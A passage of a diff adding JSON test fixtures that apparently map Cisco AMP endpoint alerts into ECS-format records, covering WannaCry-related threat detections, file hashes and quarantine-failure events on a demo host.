+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419204910251769881",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:19.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094091860Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419204910251770000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204910251769885",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:19.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094093728Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419204910251770000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204910251769881",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:18.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094095604Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419204905956803000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419204905956802584",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:18.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094097475Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419204905956803000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419204905956802583",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:18.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094099331Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419204905956803000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419204905956802582",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:18.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094101204Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419204905956803000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419204905956802581",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:18.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094103078Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419204905956803000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419204905956802580",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "tasksche.exe",
+                "pid": 4688,
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "@timestamp": "2021-01-14T13:06:18.000Z",
+            "file": {
+                "name": "u.wnry",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry",
+                "hash": {
+                    "sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10",
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
+                    "md5": "7bf2b57f2a205768755c07f238fb32cc"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
+                    "7bf2b57f2a205768755c07f238fb32cc",
+                    "45356a9dd616ed7161a3b9192e2f318d0ab5ad10"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094104954Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":644000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":4688,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419204905956803000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Ransom:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419204905956802579",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T13:06:18.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094106806Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat 